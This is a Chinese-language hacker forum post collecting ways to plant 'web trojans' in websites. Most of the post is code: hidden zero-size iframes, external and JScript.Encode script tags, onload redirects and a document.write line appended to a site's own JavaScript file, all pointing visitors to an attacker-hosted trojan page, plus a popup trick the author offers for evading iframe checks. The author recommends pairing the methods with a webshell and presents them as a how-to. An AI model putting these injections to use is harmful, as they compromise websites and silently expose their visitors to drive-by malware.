挂网马的几个方法

、最简单的也是最有效的
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、js挂马
<script src=http://www.xxx.com/muma.js></script>

三、js变形加密
<SCRIPT language=\"JScript.Encode\" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。

四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + \'\\r\\n<iframe src=\"http://www.xxx.com/muma.htm/\"></iframe>\';


几种挂马的方式，给大家总结出来，希望能有所帮助
配合自己的webshell，很爽啊~呵呵
我常用的是最下面那种



启动时加载一个网页：
<body onload=\"window.location=\'网页木马地址\';\"></
body>


加入一个隐藏框架：
</body>
<iframe src=\"网页木马地址\" name=\"zhu\" width=\"0\"
height=\"0\" frameborder=\"0\">


图片木马：
<html>
<body>
<iframe src=\"网页木马地址\" width=0 height=0></iframe>
<img src=\"图片地址\"></img>
</body>
</html>


邮箱网页木马：
<html>
<body>
<iframe src=\"网页木马地址\" width=0 height=0></iframe>
</body>
</html>


这段代码加到页面最后面：
</html><iframe src=\"网页木马地址\" name=\"zhu\" width
=\"0\" height=\"0\" frameborder=\"0\"></html>


一般的办法是在一个地方写上<iframe src=\"muma.htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe> 这样就可以访问muma的页面了

升级一下

先找找主页里面是否有JS的脚本,找到script language=\"javascript\" src=\"/xxxx.js\"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)

document.write(\'<IFRAME marginWidth=0 marginHeight=0 src=\"http://www.cqhk.cn/ma.htm\" frameBorder=0 width=0 scrolling=no height=0 topmargin=\"0\" leftmargin=\"0\"></IFRAME>\');

以上代码中的http://www.cqhk.cn/ma.htm,换成你自己的网页木马的地址.

再把修改好的JS上传覆盖原来的JS,就可以了.

哈哈...是不是很隐蔽了!

另外，这一句同样不错，用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破

<script>
file://window.showModelessDialog(\"javascript:window.open(\'http://www.cqhk.cn/index.htm\',\'k\',\'top=3000,left=3000,width=0,height=0\');

window.close();\",\"n\",\"scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px\");
</script>